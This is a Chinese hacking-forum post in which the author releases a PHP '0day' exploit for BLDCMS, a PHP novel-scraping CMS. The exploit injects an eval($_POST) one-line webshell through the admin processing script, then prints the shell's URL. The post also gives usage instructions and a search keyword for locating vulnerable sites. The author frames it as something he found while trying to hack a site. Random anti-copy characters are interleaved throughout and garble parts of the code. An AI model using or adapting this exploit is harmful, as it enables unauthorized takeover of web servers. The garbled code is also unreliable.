之前想搞一个黑阔站 发现旁站有一个站用了BLDCMS 我就下载看了.. 找到了一个getshell漏洞' e3 m0 o/ R! C- g* N7 a
+ T3 Y' L* y9 B5 a" o* ?& b5 _
8 v% ]. @$ h* p5 |6 i话说昨晚晴天小铸在90sec发现有人把这getshell漏洞的分析发出来了 擦 居然被人先发了 9 ~8 K" D6 h; A5 ?9 M
1 F1 p1 X8 u3 T: S1 J( R& l+ M既然都有人发了 我就把我之前写好的EXP放出来吧
" a2 i; K' d# W! y ) f/ Z; z+ R6 w2 T' l
view source print?01.php;">1 S- G6 l9 r* o3 c9 h o9 B
02.<!--?php! c4 D& V9 Z5 \/ z! h: l1 Y
03.echo "-------------------------------------------------------------------
1 J+ c) L+ {1 T# R/ D' c. a04.
+ ?3 ~! t7 t6 t; B' d0 J05.------------\r\n BLDCMS(白老大php小说小偷) GETSHELL 0DAY EXP
. ?" w0 X3 ~% y" h& J% X06.
1 Q9 |2 s" K( S07.(GPC=Off)\r\n Vulnerability discovery&Code by 数据流@wooyun
3 o( s1 E7 u# U6 V, i08.
$ K7 E5 d& Z* l, p09.QQ:981009941\r\n 2013.3.21\r\n
! j8 a: z1 ]7 }* {9 t8 y* b7 s# m2 N10. + x* P! s& I; b8 p: h) @
11. 2 g% [: b4 K- i3 A" p& i# ?
12.用法:php.exe EXP.php www.baidu.com /cms/ pass(一句话密码
+ J4 s( Y/ \) t" K6 G7 f3 ^- x% _9 B13.
F6 A* r" V/ z# z" ~& a14.)\r\n 搜索关键字:\"开发者: 白老大小说\"\r\n-----------
* T8 T6 x. Q9 e, S* h15. 6 Y% Z# W# f, d6 u
16.--------------------------------------------------------------------\r\n";
: E( R. h. U9 @17.$url=$argv[1];
: p9 v: G5 G5 h: m U; I18.$dir=$argv[2];* L( P( ]" O W& U
19.$pass=$argv[3];+ ]' E! l- \2 `5 U8 U
20.$eval='\';eval($_POST['.'"'.$pass.'"'.']);\'';$ G& Q: L3 o' `& u! V
21.if (emptyempty($pass)||emptyempty($url))
8 h! V! w3 M* W0 t# ~/ J: n, C22.{exit("请输入参数");}$ d; s( d- [- y4 j9 [
23.else% O# l6 f" ]. G0 x" v
24.{3 M: z- H% n" @8 r3 J. K# {
25.$fuckdata='sitename=a&qq=1&getcontent=acurl&tongji=a&cmsmd5=1&sqlite='.$ev
" i. O! D# D# s6 N9 e% t26.
. y# ]7 C* a, R0 }, r5 l; D! e, i27.al;
, M# q3 ?* ?$ R* H4 K6 ]" H28.$length = strlen($fuckdata);
: p- i8 C# H% U2 {" a% _29.function getshell($url,$pass)1 Z2 p! p) t ]/ r
30.{
7 a: J2 I+ b% O* Q% L7 c' q% c5 W- m' L31.global $url,$dir,$pass,$eval,$length,$fuckdata;
" w# g x6 I5 p$ @6 V32.$header = " OST /admin/chuli.php?action=a_1 HTTP/1.1\r\n";# u) L: |$ ~! a" h
33.$header .= "Content-Type: application/x-www-form-urlencoded\r\n";( c) ^2 [6 L! [* W i8 [. p, Y3 M$ _
34.$header .= "User-Agent: MSIE\r\n";8 w) E, T( D8 O. V: w0 T/ H
35.$header .= "Host:".$url."\r\n";; `; K |0 {* u1 E. d' e" R/ p
36.$header .= "Content-Length: ".$length."\r\n";
! C9 J8 r4 z0 l4 l4 i, S, C; |; e37.$header .= "Connection: Close\r\n";5 i2 t" n# r- [+ S; t- i& k: s# l
38.$header .="\r\n";- T5 d$ O' y# s- F8 G' W3 k
39.$header .= $fuckdata."\r\n\r\n";
- O8 T, [( f, q; t# Q' l40.$fp = fsockopen($url, 80,$errno,$errstr,15);" ^* U9 U. `5 A o3 G
41.if (!$fp), M4 a4 a* D4 V
42.{
0 F$ D* z$ Z, V9 q. O( X7 P43.exit ("利用失败:请检查指定目标是否能正常打开");
0 L2 h8 s; n" |) v1 }44.}/ ~2 F6 u$ f( t2 H: v+ r) ^
45.else{ if (!fputs($fp,$header))) L2 ` W- k+ }- F+ N4 R7 M% N$ D
46.{exit ("利用失败");}
* l5 ~* X3 d! ]% p: _4 M6 W47.else
! g. y2 ~) V6 N, D2 p( ]* z& n48.{! v8 _( F# H' W
49.$receive = '';) y* q& C& h/ x. N2 w$ n. n2 H
50.while (!feof($fp)) {& ]8 i( v# z' L
51.$receive .= @fgets($fp, 1000);4 }0 k: v0 H' m$ O* W
52.}
( h; T$ E; U( z53.@fclose($fp);
" b" h* D, V3 }6 U9 Q8 S: A, w2 F- H54.echo "$url/$dir/conn/config/normal2.php pass pass(如连接失败 请检查目标7 V. b: D d& X2 \: J
55.
) q G; Y3 _- e A9 F56.GPC是否=off)";
5 P% Q; t) [, N% l$ U/ G57.}}0 P$ E/ ?/ l6 u
58.}7 e2 u! I9 V6 I: F4 K
59.}
( E% B2 d( ^6 F, f0 [# p60.getshell($url,$pass);
+ I& [& \6 l5 h- {6 H% Y7 v8 W61.?-->
$ @3 w. n5 c9 C
6 H$ n" n0 D% ?& K! b8 ^. |, S2 R7 }& s5 ]% E) b6 i
+ h0 s5 \) m/ t
by 数据流- C" B( g$ F* q. t! j
|
发表于 2013-3-26 20:49:10
收藏
支持
反对